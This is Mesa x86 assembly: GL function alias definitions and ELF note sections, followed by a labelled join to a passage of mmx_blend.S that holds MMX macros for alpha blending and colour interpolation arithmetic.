.globl GL_PREFIX(VertexAttrib1sv) ; .set GL_PREFIX(VertexAttrib1sv), GL_PREFIX(VertexAttrib1svARB)
.globl GL_PREFIX(VertexAttrib2d) ; .set GL_PREFIX(VertexAttrib2d), GL_PREFIX(VertexAttrib2dARB)
.globl GL_PREFIX(VertexAttrib2dv) ; .set GL_PREFIX(VertexAttrib2dv), GL_PREFIX(VertexAttrib2dvARB)
.globl GL_PREFIX(VertexAttrib2f) ; .set GL_PREFIX(VertexAttrib2f), GL_PREFIX(VertexAttrib2fARB)
.globl GL_PREFIX(VertexAttrib2fv) ; .set GL_PREFIX(VertexAttrib2fv), GL_PREFIX(VertexAttrib2fvARB)
.globl GL_PREFIX(VertexAttrib2s) ; .set GL_PREFIX(VertexAttrib2s), GL_PREFIX(VertexAttrib2sARB)
.globl GL_PREFIX(VertexAttrib2sv) ; .set GL_PREFIX(VertexAttrib2sv), GL_PREFIX(VertexAttrib2svARB)
.globl GL_PREFIX(VertexAttrib3d) ; .set GL_PREFIX(VertexAttrib3d), GL_PREFIX(VertexAttrib3dARB)
.globl GL_PREFIX(VertexAttrib3dv) ; .set GL_PREFIX(VertexAttrib3dv), GL_PREFIX(VertexAttrib3dvARB)
.globl GL_PREFIX(VertexAttrib3f) ; .set GL_PREFIX(VertexAttrib3f), GL_PREFIX(VertexAttrib3fARB)
.globl GL_PREFIX(VertexAttrib3fv) ; .set GL_PREFIX(VertexAttrib3fv), GL_PREFIX(VertexAttrib3fvARB)
.globl GL_PREFIX(VertexAttrib3s) ; .set GL_PREFIX(VertexAttrib3s), GL_PREFIX(VertexAttrib3sARB)
.globl GL_PREFIX(VertexAttrib3sv) ; .set GL_PREFIX(VertexAttrib3sv), GL_PREFIX(VertexAttrib3svARB)
.globl GL_PREFIX(VertexAttrib4Nbv) ; .set GL_PREFIX(VertexAttrib4Nbv), GL_PREFIX(VertexAttrib4NbvARB)
.globl GL_PREFIX(VertexAttrib4Niv) ; .set GL_PREFIX(VertexAttrib4Niv), GL_PREFIX(VertexAttrib4NivARB)
.globl GL_PREFIX(VertexAttrib4Nsv) ; .set GL_PREFIX(VertexAttrib4Nsv), GL_PREFIX(VertexAttrib4NsvARB)
.globl GL_PREFIX(VertexAttrib4Nub) ; .set GL_PREFIX(VertexAttrib4Nub), GL_PREFIX(VertexAttrib4NubARB)
.globl GL_PREFIX(VertexAttrib4Nubv) ; .set GL_PREFIX(VertexAttrib4Nubv), GL_PREFIX(VertexAttrib4NubvARB)
.globl GL_PREFIX(VertexAttrib4Nuiv) ; .set GL_PREFIX(VertexAttrib4Nuiv), GL_PREFIX(VertexAttrib4NuivARB)
.globl GL_PREFIX(VertexAttrib4Nusv) ; .set GL_PREFIX(VertexAttrib4Nusv), GL_PREFIX(VertexAttrib4NusvARB)
.globl GL_PREFIX(VertexAttrib4bv) ; .set GL_PREFIX(VertexAttrib4bv), GL_PREFIX(VertexAttrib4bvARB)
.globl GL_PREFIX(VertexAttrib4d) ; .set GL_PREFIX(VertexAttrib4d), GL_PREFIX(VertexAttrib4dARB)
.globl GL_PREFIX(VertexAttrib4dv) ; .set GL_PREFIX(VertexAttrib4dv), GL_PREFIX(VertexAttrib4dvARB)
.globl GL_PREFIX(VertexAttrib4f) ; .set GL_PREFIX(VertexAttrib4f), GL_PREFIX(VertexAttrib4fARB)
.globl GL_PREFIX(VertexAttrib4fv) ; .set GL_PREFIX(VertexAttrib4fv), GL_PREFIX(VertexAttrib4fvARB)
.globl GL_PREFIX(VertexAttrib4iv) ; .set GL_PREFIX(VertexAttrib4iv), GL_PREFIX(VertexAttrib4ivARB)
.globl GL_PREFIX(VertexAttrib4s) ; .set GL_PREFIX(VertexAttrib4s), GL_PREFIX(VertexAttrib4sARB)
.globl GL_PREFIX(VertexAttrib4sv) ; .set GL_PREFIX(VertexAttrib4sv), GL_PREFIX(VertexAttrib4svARB)
.globl GL_PREFIX(VertexAttrib4ubv) ; .set GL_PREFIX(VertexAttrib4ubv), GL_PREFIX(VertexAttrib4ubvARB)
.globl GL_PREFIX(VertexAttrib4uiv) ; .set GL_PREFIX(VertexAttrib4uiv), GL_PREFIX(VertexAttrib4uivARB)
.globl GL_PREFIX(VertexAttrib4usv) ; .set GL_PREFIX(VertexAttrib4usv), GL_PREFIX(VertexAttrib4usvARB)
.globl GL_PREFIX(VertexAttribPointer) ; .set GL_PREFIX(VertexAttribPointer), GL_PREFIX(VertexAttribPointerARB)
.globl GL_PREFIX(BindBuffer) ; .set GL_PREFIX(BindBuffer), GL_PREFIX(BindBufferARB)
.globl GL_PREFIX(BufferData) ; .set GL_PREFIX(BufferData), GL_PREFIX(BufferDataARB)
.globl GL_PREFIX(BufferSubData) ; .set GL_PREFIX(BufferSubData), GL_PREFIX(BufferSubDataARB)
.globl GL_PREFIX(DeleteBuffers) ; .set GL_PREFIX(DeleteBuffers), GL_PREFIX(DeleteBuffersARB)
.globl GL_PREFIX(GenBuffers) ; .set GL_PREFIX(GenBuffers), GL_PREFIX(GenBuffersARB)
.globl GL_PREFIX(GetBufferParameteriv) ; .set GL_PREFIX(GetBufferParameteriv), GL_PREFIX(GetBufferParameterivARB)
.globl GL_PREFIX(GetBufferPointerv) ; .set GL_PREFIX(GetBufferPointerv), GL_PREFIX(GetBufferPointervARB)
.globl GL_PREFIX(GetBufferSubData) ; .set GL_PREFIX(GetBufferSubData), GL_PREFIX(GetBufferSubDataARB)
.globl GL_PREFIX(IsBuffer) ; .set GL_PREFIX(IsBuffer), GL_PREFIX(IsBufferARB)
.globl GL_PREFIX(MapBuffer) ; .set GL_PREFIX(MapBuffer), GL_PREFIX(MapBufferARB)
.globl GL_PREFIX(UnmapBuffer) ; .set GL_PREFIX(UnmapBuffer), GL_PREFIX(UnmapBufferARB)
.globl GL_PREFIX(BeginQuery) ; .set GL_PREFIX(BeginQuery), GL_PREFIX(BeginQueryARB)
.globl GL_PREFIX(DeleteQueries) ; .set GL_PREFIX(DeleteQueries), GL_PREFIX(DeleteQueriesARB)
.globl GL_PREFIX(EndQuery) ; .set GL_PREFIX(EndQuery), GL_PREFIX(EndQueryARB)
.globl GL_PREFIX(GenQueries) ; .set GL_PREFIX(GenQueries), GL_PREFIX(GenQueriesARB)
.globl GL_PREFIX(GetQueryObjectiv) ; .set GL_PREFIX(GetQueryObjectiv), GL_PREFIX(GetQueryObjectivARB)
.globl GL_PREFIX(GetQueryObjectuiv) ; .set GL_PREFIX(GetQueryObjectuiv), GL_PREFIX(GetQueryObjectuivARB)
.globl GL_PREFIX(GetQueryiv) ; .set GL_PREFIX(GetQueryiv), GL_PREFIX(GetQueryivARB)
.globl GL_PREFIX(IsQuery) ; .set GL_PREFIX(IsQuery), GL_PREFIX(IsQueryARB)
.globl GL_PREFIX(CompileShader) ; .set GL_PREFIX(CompileShader), GL_PREFIX(CompileShaderARB)
.globl GL_PREFIX(GetActiveUniform) ; .set GL_PREFIX(GetActiveUniform), GL_PREFIX(GetActiveUniformARB)
.globl GL_PREFIX(GetShaderSource) ; .set GL_PREFIX(GetShaderSource), GL_PREFIX(GetShaderSourceARB)
.globl GL_PREFIX(GetUniformLocation) ; .set GL_PREFIX(GetUniformLocation), GL_PREFIX(GetUniformLocationARB)
.globl GL_PREFIX(GetUniformfv) ; .set GL_PREFIX(GetUniformfv), GL_PREFIX(GetUniformfvARB)
.globl GL_PREFIX(GetUniformiv) ; .set GL_PREFIX(GetUniformiv), GL_PREFIX(GetUniformivARB)
.globl GL_PREFIX(LinkProgram) ; .set GL_PREFIX(LinkProgram), GL_PREFIX(LinkProgramARB)
.globl GL_PREFIX(ShaderSource) ; .set GL_PREFIX(ShaderSource), GL_PREFIX(ShaderSourceARB)
.globl GL_PREFIX(Uniform1f) ; .set GL_PREFIX(Uniform1f), GL_PREFIX(Uniform1fARB)
.globl GL_PREFIX(Uniform1fv) ; .set GL_PREFIX(Uniform1fv), GL_PREFIX(Uniform1fvARB)
.globl GL_PREFIX(Uniform1i) ; .set GL_PREFIX(Uniform1i), GL_PREFIX(Uniform1iARB)
.globl GL_PREFIX(Uniform1iv) ; .set GL_PREFIX(Uniform1iv), GL_PREFIX(Uniform1ivARB)
.globl GL_PREFIX(Uniform2f) ; .set GL_PREFIX(Uniform2f), GL_PREFIX(Uniform2fARB)
.globl GL_PREFIX(Uniform2fv) ; .set GL_PREFIX(Uniform2fv), GL_PREFIX(Uniform2fvARB)
.globl GL_PREFIX(Uniform2i) ; .set GL_PREFIX(Uniform2i), GL_PREFIX(Uniform2iARB)
.globl GL_PREFIX(Uniform2iv) ; .set GL_PREFIX(Uniform2iv), GL_PREFIX(Uniform2ivARB)
.globl GL_PREFIX(Uniform3f) ; .set GL_PREFIX(Uniform3f), GL_PREFIX(Uniform3fARB)
.globl GL_PREFIX(Uniform3fv) ; .set GL_PREFIX(Uniform3fv), GL_PREFIX(Uniform3fvARB)
.globl GL_PREFIX(Uniform3i) ; .set GL_PREFIX(Uniform3i), GL_PREFIX(Uniform3iARB)
.globl GL_PREFIX(Uniform3iv) ; .set GL_PREFIX(Uniform3iv), GL_PREFIX(Uniform3ivARB)
.globl GL_PREFIX(Uniform4f) ; .set GL_PREFIX(Uniform4f), GL_PREFIX(Uniform4fARB)
.globl GL_PREFIX(Uniform4fv) ; .set GL_PREFIX(Uniform4fv), GL_PREFIX(Uniform4fvARB)
.globl GL_PREFIX(Uniform4i) ; .set GL_PREFIX(Uniform4i), GL_PREFIX(Uniform4iARB)
.globl GL_PREFIX(Uniform4iv) ; .set GL_PREFIX(Uniform4iv), GL_PREFIX(Uniform4ivARB)
.globl GL_PREFIX(UniformMatrix2fv) ; .set GL_PREFIX(UniformMatrix2fv), GL_PREFIX(UniformMatrix2fvARB)
.globl GL_PREFIX(UniformMatrix3fv) ; .set GL_PREFIX(UniformMatrix3fv), GL_PREFIX(UniformMatrix3fvARB)
.globl GL_PREFIX(UniformMatrix4fv) ; .set GL_PREFIX(UniformMatrix4fv), GL_PREFIX(UniformMatrix4fvARB)
.globl GL_PREFIX(UseProgram) ; .set GL_PREFIX(UseProgram), GL_PREFIX(UseProgramObjectARB)
.globl GL_PREFIX(ValidateProgram) ; .set GL_PREFIX(ValidateProgram), GL_PREFIX(ValidateProgramARB)
.globl GL_PREFIX(BindAttribLocation) ; .set GL_PREFIX(BindAttribLocation), GL_PREFIX(BindAttribLocationARB)
.globl GL_PREFIX(GetActiveAttrib) ; .set GL_PREFIX(GetActiveAttrib), GL_PREFIX(GetActiveAttribARB)
.globl GL_PREFIX(GetAttribLocation) ; .set GL_PREFIX(GetAttribLocation), GL_PREFIX(GetAttribLocationARB)
.globl GL_PREFIX(DrawBuffers) ; .set GL_PREFIX(DrawBuffers), GL_PREFIX(DrawBuffersARB)
.globl GL_PREFIX(DrawBuffersATI) ; .set GL_PREFIX(DrawBuffersATI), GL_PREFIX(DrawBuffersARB)
.globl GL_PREFIX(PointParameterf) ; .set GL_PREFIX(PointParameterf), GL_PREFIX(PointParameterfEXT)
.globl GL_PREFIX(PointParameterfARB) ; .set GL_PREFIX(PointParameterfARB), GL_PREFIX(PointParameterfEXT)
.globl GL_PREFIX(PointParameterfv) ; .set GL_PREFIX(PointParameterfv), GL_PREFIX(PointParameterfvEXT)
.globl GL_PREFIX(PointParameterfvARB) ; .set GL_PREFIX(PointParameterfvARB), GL_PREFIX(PointParameterfvEXT)
.globl GL_PREFIX(SecondaryColor3b) ; .set GL_PREFIX(SecondaryColor3b), GL_PREFIX(SecondaryColor3bEXT)
.globl GL_PREFIX(SecondaryColor3bv) ; .set GL_PREFIX(SecondaryColor3bv), GL_PREFIX(SecondaryColor3bvEXT)
.globl GL_PREFIX(SecondaryColor3d) ; .set GL_PREFIX(SecondaryColor3d), GL_PREFIX(SecondaryColor3dEXT)
.globl GL_PREFIX(SecondaryColor3dv) ; .set GL_PREFIX(SecondaryColor3dv), GL_PREFIX(SecondaryColor3dvEXT)
.globl GL_PREFIX(SecondaryColor3f) ; .set GL_PREFIX(SecondaryColor3f), GL_PREFIX(SecondaryColor3fEXT)
.globl GL_PREFIX(SecondaryColor3fv) ; .set GL_PREFIX(SecondaryColor3fv), GL_PREFIX(SecondaryColor3fvEXT)
.globl GL_PREFIX(SecondaryColor3i) ; .set GL_PREFIX(SecondaryColor3i), GL_PREFIX(SecondaryColor3iEXT)
.globl GL_PREFIX(SecondaryColor3iv) ; .set GL_PREFIX(SecondaryColor3iv), GL_PREFIX(SecondaryColor3ivEXT)
.globl GL_PREFIX(SecondaryColor3s) ; .set GL_PREFIX(SecondaryColor3s), GL_PREFIX(SecondaryColor3sEXT)
.globl GL_PREFIX(SecondaryColor3sv) ; .set GL_PREFIX(SecondaryColor3sv), GL_PREFIX(SecondaryColor3svEXT)
.globl GL_PREFIX(SecondaryColor3ub) ; .set GL_PREFIX(SecondaryColor3ub), GL_PREFIX(SecondaryColor3ubEXT)
.globl GL_PREFIX(SecondaryColor3ubv) ; .set GL_PREFIX(SecondaryColor3ubv), GL_PREFIX(SecondaryColor3ubvEXT)
.globl GL_PREFIX(SecondaryColor3ui) ; .set GL_PREFIX(SecondaryColor3ui), GL_PREFIX(SecondaryColor3uiEXT)
.globl GL_PREFIX(SecondaryColor3uiv) ; .set GL_PREFIX(SecondaryColor3uiv), GL_PREFIX(SecondaryColor3uivEXT)
.globl GL_PREFIX(SecondaryColor3us) ; .set GL_PREFIX(SecondaryColor3us), GL_PREFIX(SecondaryColor3usEXT)
.globl GL_PREFIX(SecondaryColor3usv) ; .set GL_PREFIX(SecondaryColor3usv), GL_PREFIX(SecondaryColor3usvEXT)
.globl GL_PREFIX(SecondaryColorPointer) ; .set GL_PREFIX(SecondaryColorPointer), GL_PREFIX(SecondaryColorPointerEXT)
.globl GL_PREFIX(MultiDrawArrays) ; .set GL_PREFIX(MultiDrawArrays), GL_PREFIX(MultiDrawArraysEXT)
.globl GL_PREFIX(MultiDrawElements) ; .set GL_PREFIX(MultiDrawElements), GL_PREFIX(MultiDrawElementsEXT)
.globl GL_PREFIX(FogCoordPointer) ; .set GL_PREFIX(FogCoordPointer), GL_PREFIX(FogCoordPointerEXT)
.globl GL_PREFIX(FogCoordd) ; .set GL_PREFIX(FogCoordd), GL_PREFIX(FogCoorddEXT)
.globl GL_PREFIX(FogCoorddv) ; .set GL_PREFIX(FogCoorddv), GL_PREFIX(FogCoorddvEXT)
.globl GL_PREFIX(FogCoordf) ; .set GL_PREFIX(FogCoordf), GL_PREFIX(FogCoordfEXT)
.globl GL_PREFIX(FogCoordfv) ; .set GL_PREFIX(FogCoordfv), GL_PREFIX(FogCoordfvEXT)
.globl GL_PREFIX(BlendFuncSeparate) ; .set GL_PREFIX(BlendFuncSeparate), GL_PREFIX(BlendFuncSeparateEXT)
.globl GL_PREFIX(WindowPos2d) ; .set GL_PREFIX(WindowPos2d), GL_PREFIX(WindowPos2dMESA)
.globl GL_PREFIX(WindowPos2dARB) ; .set GL_PREFIX(WindowPos2dARB), GL_PREFIX(WindowPos2dMESA)
.globl GL_PREFIX(WindowPos2dv) ; .set GL_PREFIX(WindowPos2dv), GL_PREFIX(WindowPos2dvMESA)
.globl GL_PREFIX(WindowPos2dvARB) ; .set GL_PREFIX(WindowPos2dvARB), GL_PREFIX(WindowPos2dvMESA)
.globl GL_PREFIX(WindowPos2f) ; .set GL_PREFIX(WindowPos2f), GL_PREFIX(WindowPos2fMESA)
.globl GL_PREFIX(WindowPos2fARB) ; .set GL_PREFIX(WindowPos2fARB), GL_PREFIX(WindowPos2fMESA)
.globl GL_PREFIX(WindowPos2fv) ; .set GL_PREFIX(WindowPos2fv), GL_PREFIX(WindowPos2fvMESA)
.globl GL_PREFIX(WindowPos2fvARB) ; .set GL_PREFIX(WindowPos2fvARB), GL_PREFIX(WindowPos2fvMESA)
.globl GL_PREFIX(WindowPos2i) ; .set GL_PREFIX(WindowPos2i), GL_PREFIX(WindowPos2iMESA)
.globl GL_PREFIX(WindowPos2iARB) ; .set GL_PREFIX(WindowPos2iARB), GL_PREFIX(WindowPos2iMESA)
.globl GL_PREFIX(WindowPos2iv) ; .set GL_PREFIX(WindowPos2iv), GL_PREFIX(WindowPos2ivMESA)
.globl GL_PREFIX(WindowPos2ivARB) ; .set GL_PREFIX(WindowPos2ivARB), GL_PREFIX(WindowPos2ivMESA)
.globl GL_PREFIX(WindowPos2s) ; .set GL_PREFIX(WindowPos2s), GL_PREFIX(WindowPos2sMESA)
.globl GL_PREFIX(WindowPos2sARB) ; .set GL_PREFIX(WindowPos2sARB), GL_PREFIX(WindowPos2sMESA)
.globl GL_PREFIX(WindowPos2sv) ; .set GL_PREFIX(WindowPos2sv), GL_PREFIX(WindowPos2svMESA)
.globl GL_PREFIX(WindowPos2svARB) ; .set GL_PREFIX(WindowPos2svARB), GL_PREFIX(WindowPos2svMESA)
.globl GL_PREFIX(WindowPos3d) ; .set GL_PREFIX(WindowPos3d), GL_PREFIX(WindowPos3dMESA)
.globl GL_PREFIX(WindowPos3dARB) ; .set GL_PREFIX(WindowPos3dARB), GL_PREFIX(WindowPos3dMESA)
.globl GL_PREFIX(WindowPos3dv) ; .set GL_PREFIX(WindowPos3dv), GL_PREFIX(WindowPos3dvMESA)
.globl GL_PREFIX(WindowPos3dvARB) ; .set GL_PREFIX(WindowPos3dvARB), GL_PREFIX(WindowPos3dvMESA)
.globl GL_PREFIX(WindowPos3f) ; .set GL_PREFIX(WindowPos3f), GL_PREFIX(WindowPos3fMESA)
.globl GL_PREFIX(WindowPos3fARB) ; .set GL_PREFIX(WindowPos3fARB), GL_PREFIX(WindowPos3fMESA)
.globl GL_PREFIX(WindowPos3fv) ; .set GL_PREFIX(WindowPos3fv), GL_PREFIX(WindowPos3fvMESA)
.globl GL_PREFIX(WindowPos3fvARB) ; .set GL_PREFIX(WindowPos3fvARB), GL_PREFIX(WindowPos3fvMESA)
.globl GL_PREFIX(WindowPos3i) ; .set GL_PREFIX(WindowPos3i), GL_PREFIX(WindowPos3iMESA)
.globl GL_PREFIX(WindowPos3iARB) ; .set GL_PREFIX(WindowPos3iARB), GL_PREFIX(WindowPos3iMESA)
.globl GL_PREFIX(WindowPos3iv) ; .set GL_PREFIX(WindowPos3iv), GL_PREFIX(WindowPos3ivMESA)
.globl GL_PREFIX(WindowPos3ivARB) ; .set GL_PREFIX(WindowPos3ivARB), GL_PREFIX(WindowPos3ivMESA)
.globl GL_PREFIX(WindowPos3s) ; .set GL_PREFIX(WindowPos3s), GL_PREFIX(WindowPos3sMESA)
.globl GL_PREFIX(WindowPos3sARB) ; .set GL_PREFIX(WindowPos3sARB), GL_PREFIX(WindowPos3sMESA)
.globl GL_PREFIX(WindowPos3sv) ; .set GL_PREFIX(WindowPos3sv), GL_PREFIX(WindowPos3svMESA)
.globl GL_PREFIX(WindowPos3svARB) ; .set GL_PREFIX(WindowPos3svARB), GL_PREFIX(WindowPos3svMESA)
.globl GL_PREFIX(BindProgramARB) ; .set GL_PREFIX(BindProgramARB), GL_PREFIX(BindProgramNV)
.globl GL_PREFIX(DeleteProgramsARB) ; .set GL_PREFIX(DeleteProgramsARB), GL_PREFIX(DeleteProgramsNV)
.globl GL_PREFIX(GenProgramsARB) ; .set GL_PREFIX(GenProgramsARB), GL_PREFIX(GenProgramsNV)
.globl GL_PREFIX(GetVertexAttribPointerv) ; .set GL_PREFIX(GetVertexAttribPointerv), GL_PREFIX(GetVertexAttribPointervNV)
.globl GL_PREFIX(GetVertexAttribPointervARB) ; .set GL_PREFIX(GetVertexAttribPointervARB), GL_PREFIX(GetVertexAttribPointervNV)
.globl GL_PREFIX(IsProgramARB) ; .set GL_PREFIX(IsProgramARB), GL_PREFIX(IsProgramNV)
.globl GL_PREFIX(PointParameteri) ; .set GL_PREFIX(PointParameteri), GL_PREFIX(PointParameteriNV)
.globl GL_PREFIX(PointParameteriv) ; .set GL_PREFIX(PointParameteriv), GL_PREFIX(PointParameterivNV)
.globl GL_PREFIX(BlendEquationSeparate) ; .set GL_PREFIX(BlendEquationSeparate), GL_PREFIX(_dispatch_stub_745)
/* ELF ABI-tag note: declares that a TLS-enabled Linux build requires at
 * least kernel 2.4.20 (the note data below: ABI tag 0 = Linux, then the
 * three-part minimum version).  Note header layout is namesz/descsz/type. */
#if defined(GLX_USE_TLS) && defined(__linux__)
.section ".note.ABI-tag", "a"
.p2align 2
.long 1f - 0f /* name length */
.long 3f - 2f /* data length */
.long 1 /* note type (NT_GNU_ABI_TAG) */
0: .asciz "GNU" /* vendor name */
1: .p2align 2
2: .long 0 /* note data: the ABI tag (0 = Linux) */
.long 2,4,20 /* Minimum kernel version w/TLS */
3: .p2align 2 /* pad out section */
#endif /* GLX_USE_TLS */
/* Mark the stack as non-executable so the linker does not request an
 * executable stack for objects that include this file. */
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
/* ----------------------------------------------------------------------
 * NOTE(review): the raw lines here were dataset-concatenation metadata,
 * not assembly; preserved for reference:
 *   AIFM-sys/AIFM | 17,042
 *   shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/mmx_blend.S
 * Everything below this point belongs to that second file (mmx_blend.S).
 * ---------------------------------------------------------------------- */
/*
* Written by Jos Fonseca <j_r_fonseca@yahoo.co.uk>
*/
#ifdef USE_MMX_ASM
#include "matypes.h"
/* integer multiplication - alpha plus one
*
* makes the following approximation to the division (Sree)
*
* rgb*a/255 ~= (rgb*(a+1)) / 256  (i.e. a right shift by 8)
*
* which is the fastest method that satisfies the following OpenGL criteria
*
* 0*0 = 0 and 255*255 = 255
*
* note that MX1 is a register with 0xffffffffffffffff constant which can be easily obtained making
*
* PCMPEQW ( MX1, MX1 )
*/
/* GMB_MULT_AP1(MP1,MA1, MP2,MA2, MX1): per-channel multiply using the
 * "alpha plus one" trick described above.  MX1 must hold all-ones
 * (0xffff per word), so PSUBW(MX1, MAn) computes an + 1; the result
 * sn = (pn*(an+1)) >> 8 ends up in MAn.  Second-pixel ops are wrapped
 * in TWO() and disappear in the one-pixel expansion. */
#define GMB_MULT_AP1( MP1, MA1, MP2, MA2, MX1 ) \
PSUBW ( MX1, MA1 ) /* a1 + 1 | a1 + 1 | a1 + 1 | a1 + 1 */ ;\
PMULLW ( MP1, MA1 ) /* t1 = p1*(a1+1) */ ;\
;\
TWO(PSUBW ( MX1, MA2 )) /* a2 + 1 | a2 + 1 | a2 + 1 | a2 + 1 */ ;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = p2*(a2+1) */ ;\
;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 ~= t1/255 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 ~= t2/255 */
/* integer multiplication - geometric series
*
* takes the geometric series approximation to the division
*
* t/255 = (t >> 8) + (t >> 16) + (t >> 24) ..
*
* in this case just the first two terms to fit in 16bit arithmetic
*
* t/255 ~= (t + (t >> 8)) >> 8
*
* note that by itself it doesn't satisfy the OpenGL criteria, since it maps 255*255 to 254,
* so either the special case a = 255 must be handled or roundoff must be used
*/
/* GMB_MULT_GS(MP1,MA1, MP2,MA2): per-channel sn = pn*an/255 via the
 * two-term geometric series (t + (t >> 8)) >> 8.  Truncating variant:
 * see the note above about 255*255 -> 254.  MPn is clobbered as
 * scratch; the result ends up in MAn. */
#define GMB_MULT_GS( MP1, MA1, MP2, MA2 ) \
PMULLW ( MP1, MA1 ) /* t1 = p1*a1 */ ;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = p2*a2 */ ;\
;\
MOVQ ( MA1, MP1 ) ;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 */ ;\
;\
TWO(MOVQ ( MA2, MP2 )) ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 */ ;\
;\
PADDW ( MP1, MA1 ) /* t1 + (t1 >> 8) ~= (t1/255) << 8 */ ;\
PSRLW ( CONST(8), MA1 ) /* sa1 | sb1 | sg1 | sr1 */ ;\
;\
TWO(PADDW ( MP2, MA2 )) /* t2 + (t2 >> 8) ~= (t2/255) << 8 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* sa2 | sb2 | sg2 | sr2 */
/* integer multiplication - geometric series plus rounding
*
* when using a geometric series division instead of truncating the result
* use roundoff in the approximation (Jim Blinn)
*
* t = rgb*a + 0x80
*
* achieving the exact results
*
* note that M80 is register with the 0x0080008000800080 constant
*/
/* GMB_MULT_GSR(MP1,MA1, MP2,MA2, M80): like GMB_MULT_GS but adds the
 * 0x80 rounding bias (Jim Blinn) before the series, giving exact
 * pn*an/255 results.  M80 must hold 0x0080008000800080.  MPn is
 * clobbered as scratch; the result ends up in MAn. */
#define GMB_MULT_GSR( MP1, MA1, MP2, MA2, M80 ) \
PMULLW ( MP1, MA1 ) /* t1 = p1*a1 */ ;\
PADDW ( M80, MA1 ) /* t1 += 0x80 */ ;\
;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = p2*a2 */ ;\
TWO(PADDW ( M80, MA2 )) /* t2 += 0x80 */ ;\
;\
MOVQ ( MA1, MP1 ) ;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 */ ;\
;\
TWO(MOVQ ( MA2, MP2 )) ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 */ ;\
;\
PADDW ( MP1, MA1 ) /* t1 + (t1 >> 8) ~= (t1/255) << 8 */ ;\
PSRLW ( CONST(8), MA1 ) /* sa1 | sb1 | sg1 | sr1 */ ;\
;\
TWO(PADDW ( MP2, MA2 )) /* t2 + (t2 >> 8) ~= (t2/255) << 8 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* sa2 | sb2 | sg2 | sr2 */
/* linear interpolation - geometric series
*/
/* GMB_LERP_GS(MP1,MQ1,MA1, MP2,MQ2,MA2): per-channel lerp
 * sn = qn + (pn - qn)*an/255, dividing via the two-term geometric
 * series.  MAn must hold the broadcast alpha (see GMB_ALPHA); MPn and
 * MQn are clobbered as scratch; the result ends up in MAn.
 * (Inline comments previously wrote the product as (q - p)*a; PSUBW
 * with this operand order computes p - q, fixed below.) */
#define GMB_LERP_GS( MP1, MQ1, MA1, MP2, MQ2, MA2) \
PSUBW ( MQ1, MP1 ) /* pa1 - qa1 | pb1 - qb1 | pg1 - qg1 | pr1 - qr1 */ ;\
PSLLW ( CONST(8), MQ1 ) /* q1 << 8 */ ;\
PMULLW ( MP1, MA1 ) /* t1 = (p1 - q1)*a1 */ ;\
;\
TWO(PSUBW ( MQ2, MP2 )) /* pa2 - qa2 | pb2 - qb2 | pg2 - qg2 | pr2 - qr2 */ ;\
TWO(PSLLW ( CONST(8), MQ2 )) /* q2 << 8 */ ;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = (p2 - q2)*a2 */ ;\
;\
MOVQ ( MA1, MP1 ) ;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 */ ;\
;\
TWO(MOVQ ( MA2, MP2 )) ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 */ ;\
;\
PADDW ( MP1, MA1 ) /* t1 + (t1 >> 8) ~= (t1/255) << 8 */ ;\
TWO(PADDW ( MP2, MA2 )) /* t2 + (t2 >> 8) ~= (t2/255) << 8 */ ;\
;\
PADDW ( MQ1, MA1 ) /* (t1/255 + q1) << 8 */ ;\
TWO(PADDW ( MQ2, MA2 )) /* (t2/255 + q2) << 8 */ ;\
;\
PSRLW ( CONST(8), MA1 ) /* sa1 | sb1 | sg1 | sr1 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* sa2 | sb2 | sg2 | sr2 */
/* linear interpolation - geometric series with roundoff
*
* this is a generalization of Blinn's formula to signed arithmetic
*
* note that M80 is a register with the 0x0080008000800080 constant
*/
/* GMB_LERP_GSR(MP1,MQ1,MA1, MP2,MQ2,MA2, M80): rounded lerp
 * sn = qn + (pn - qn)*an/255, generalizing Blinn's 0x80 bias to the
 * signed difference: when pn < qn the product is negative, so 0x100 is
 * conditionally subtracted (sign bit extracted via PSRLW 15) before the
 * bias is added.  M80 must hold 0x0080008000800080; MAn must hold the
 * broadcast alpha; MPn/MQn are clobbered; the result ends up in MAn. */
#define GMB_LERP_GSR( MP1, MQ1, MA1, MP2, MQ2, MA2, M80) \
PSUBW ( MQ1, MP1 ) /* pa1 - qa1 | pb1 - qb1 | pg1 - qg1 | pr1 - qr1 */ ;\
PSLLW ( CONST(8), MQ1 ) /* q1 << 8 */ ;\
PMULLW ( MP1, MA1 ) /* t1 = (p1 - q1)*a1 */ ;\
;\
TWO(PSUBW ( MQ2, MP2 )) /* pa2 - qa2 | pb2 - qb2 | pg2 - qg2 | pr2 - qr2 */ ;\
TWO(PSLLW ( CONST(8), MQ2 )) /* q2 << 8 */ ;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = (p2 - q2)*a2 */ ;\
;\
PSRLW ( CONST(15), MP1 ) /* q1 > p1 ? 1 : 0 */ ;\
TWO(PSRLW ( CONST(15), MP2 )) /* q2 > p2 ? 1 : 0 */ ;\
;\
PSLLW ( CONST(8), MP1 ) /* q1 > p1 ? 0x100 : 0 */ ;\
TWO(PSLLW ( CONST(8), MP2 )) /* q2 > p2 ? 0x100 : 0 */ ;\
;\
PSUBW ( MP1, MA1 ) /* t1 -=? 0x100 */ ;\
TWO(PSUBW ( MP2, MA2 )) /* t2 -=? 0x100 */ ;\
;\
PADDW ( M80, MA1 ) /* t1 += 0x80 */ ;\
TWO(PADDW ( M80, MA2 )) /* t2 += 0x80 */ ;\
;\
MOVQ ( MA1, MP1 ) ;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 */ ;\
;\
TWO(MOVQ ( MA2, MP2 )) ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 */ ;\
;\
